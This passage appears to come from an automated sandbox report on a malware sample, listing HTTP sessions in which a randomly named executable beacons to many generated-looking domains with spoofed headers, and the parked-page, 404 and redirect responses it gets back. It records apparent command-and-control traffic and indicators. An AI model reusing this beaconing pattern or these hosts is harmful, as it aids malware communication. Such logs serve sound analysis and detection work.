                                                                                                                                                                                                                  Data Ascii: xOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.indexOf("&"))}return w}var k=("cmp_proto" in h)?h.cmp_proto:"https:";if(k!="http:"&&k!="https:")
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169605970 CET1236INData Raw: 61 72 20 66 3d 78 28 22 63 6d 70 72 65 67 75 6c 61 74 69 6f 6e 6b 65 79 22 2c 22 63 6d 70 5f 72 65 67 75 6c 61 74 69 6f 6e 6b 65 79 22 20 69 6e 20 68 3f 68 2e 63 6d 70 5f 72 65 67 75 6c 61 74 69 6f 6e 6b 65 79 3a 22 22 29 3b 76 61 72 20 72 3d 78
                                                                                                                                                                                                                  Data Ascii: ar f=x("cmpregulationkey","cmp_regulationkey" in h?h.cmp_regulationkey:"");var r=x("cmpgppkey","cmp_gppkey" in h?h.cmp_gppkey:"");var n=x("cmpatt","cmp_att" in h?h.cmp_att:"");j.src=k+"//"+h.cmp_host+"/delivery/cmp.php?"+("cmp_id" in h&&h.cmp_
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169617891 CET1236INData Raw: 3d 22 22 7d 76 61 72 20 6a 3d 75 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6a 2e 73 72 63 3d 6b 2b 22 2f 2f 22 2b 68 2e 63 6d 70 5f 63 64 6e 2b 22 2f 64 65 6c 69 76 65 72 79 2f 22 2b 6d 2b 22 2f 63 6d 70 22 2b 62
                                                                                                                                                                                                                  Data Ascii: =""}var j=u.createElement("script");j.src=k+"//"+h.cmp_cdn+"/delivery/"+m+"/cmp"+b+p+".js";j.type="text/javascript";j.setAttribute("data-cmp-ab","1");j.async=true;if(u.currentScript&&u.currentScript.parentElement){u.currentScript.parentElement
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169629097 CET424INData Raw: 65 6c 73 65 7b 76 61 72 20 63 3d 62 2e 73 75 62 73 74 72 28 62 2e 69 6e 64 65 78 4f 66 28 22 3d 22 29 2b 31 2c 62 2e 6c 65 6e 67 74 68 29 7d 69 66 28 68 3d 3d 67 29 7b 66 3d 63 7d 76 61 72 20 65 3d 62 2e 69 6e 64 65 78 4f 66 28 22 3b 22 29 2b 31
                                                                                                                                                                                                                  Data Ascii: else{var c=b.substr(b.indexOf("=")+1,b.length)}if(h==g){f=c}var e=b.indexOf(";")+1;if(e==0){e=b.length}b=b.substring(e,b.length)}return(f)};window.cmp_stub=function(){var a=arguments;__cmp.a=__cmp.a||[];if(!a.length){return __cmp.a}else{if(a[0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.169640064 CET1236INData Raw: 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 69 66 28
                                                                                                                                                                                                                  Data Ascii: f(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"||a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}else{if(a.le
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.170239925 CET1236INData Raw: 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f 6e 73 3a 5b 30 5d 2c 67 70 70 53 74 72 69 6e 67 3a 22 22 2c 70 69 6e 67 44 61 74
                                                                                                                                                                                                                  Data Ascii: ectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"||g==="getSection"||g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}}}}}};window.cmp_msghandler
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.174195051 CET1236INData Raw: 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 3a 65 2c 22 2a 22 29 7d 2c 22 70 61 72 61 6d 65 74 65 72 22 20 69 6e 20 62 3f 62 2e 70 61 72 61 6d 65 74
                                                                                                                                                                                                                  Data Ascii: llId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)||(typeof(window[a])!=="function"&&typeof(window[a])!=="object"&&(typeof(wi


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  74192.168.2.650215154.212.231.82806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068675041 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.951647997 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  75192.168.2.65021691.195.240.19806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068676949 CET271OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: www.gahyqah.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747026920 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                  transfer-encoding: chunked
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                  pragma: no-cache
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==
                                                                                                                                                                                                                  last-modified: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  x-cache-miss-from: parking-7596689c44-prw7b
                                                                                                                                                                                                                  server: Parking/1.0
                                                                                                                                                                                                                  Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com&nbsp;-&nbsp;gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From g
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747109890 CET1236INData Raw: 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c
                                                                                                                                                                                                                  Data Ascii: eneral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747122049 CET424INData Raw: 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66
                                                                                                                                                                                                                  Data Ascii: -style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=re
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747468948 CET1236INData Raw: 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 7d 62 75 74 74 6f 6e 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 72 69 6e 67 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d
                                                                                                                                                                                                                  Data Ascii: yle:none;padding:0}button:-moz-focusring,[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring{outline:1px dotted ButtonText}fieldset{padding:.35em .75em .625em}legend{box-sizing:border-box;color:inherit;display
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747625113 CET212INData Raw: 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 68 65 61 64 69 6e 67 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 62 75 79 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 2d 74 65 78 74 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 7d
                                                                                                                                                                                                                  Data Ascii: ox__content-heading{font-size:15px}.container-buybox__content-text{font-size:12px}.container-buybox__content-link{color:#949494}.container-buybox__content-link--no-decoration{text-decoration:none}.container-searc
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.747636080 CET1236INData Raw: 68 62 6f 78 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e
                                                                                                                                                                                                                  Data Ascii: hbox{margin-bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__butt
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748137951 CET1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 66 35 66 35 66 3b 66 6f 6e 74 2d 73 69 0d 0a 31 32 30 43 0d 0a 7a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 2e 63 6f
                                                                                                                                                                                                                  Data Ascii: background:#5f5f5f;font-si120Cze:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-inter
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748148918 CET1236INData Raw: 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 62 6f 64 79 20 74 61 62 6c 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74
                                                                                                                                                                                                                  Data Ascii: odal-window__content-body table td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 2
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748162985 CET1236INData Raw: 6e 74 65 72 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 61 36 32 36 38 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73
                                                                                                                                                                                                                  Data Ascii: nter;top:0;left:0;right:0;bottom:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;trans
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.748177052 CET948INData Raw: 72 2d 61 64 73 2d 2d 74 77 6f 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 2e 35 25 3b 68 65 69 67 68 74 3a 37 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70
                                                                                                                                                                                                                  Data Ascii: r-ads--twot{margin-top:2.5%;height:700px}.container-content__webarchive{margin-top:4.5%}.container-content__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.752335072 CET1236INData Raw: 35 37 31 0d 0a 2d 63 6f 6e 74 65 6e 74 2d 2d 74 77 6f 74 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 72 69 67 68 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 2d 79 3a 74 6f 70 7d 2e 63 6f 6e 74 61 69 6e 65 72
                                                                                                                                                                                                                  Data Ascii: 571-content--twot .container-content__right{background-position-y:top}.container-content--wa .container-content__left{background-position-y:top}.container-content--wa .container-content__right{background-position-y:top}.two-tier-ads-list{pad


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  76192.168.2.65021844.221.84.105806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.068933964 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vocyzit.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.494942904 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347469|1731347428|20|2|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  77192.168.2.650219178.162.203.226806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.223047018 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  78192.168.2.65022618.208.156.248801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.603477955 CET353OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vonypom.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.028491974 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:10 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347470|1731347428|12|3|0; path=/; domain=.vonypom.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  79192.168.2.650228199.191.50.83801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.620594978 CET281OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: galyqaz.com
                                                                                                                                                                                                                  Cookie: vsid=903vr478893028933998491
                                                                                                                                                                                                                  Nov 11, 2024 18:51:12.470735073 CET620INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:11 GMT
                                                                                                                                                                                                                  Server: Apache
                                                                                                                                                                                                                  Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                  Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                  Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                                                                  Location: //ww3.galyqaz.com
                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  80192.168.2.650227154.212.231.82801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.625415087 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gadyniw.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:11.524477005 CET696INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:11 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 548
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
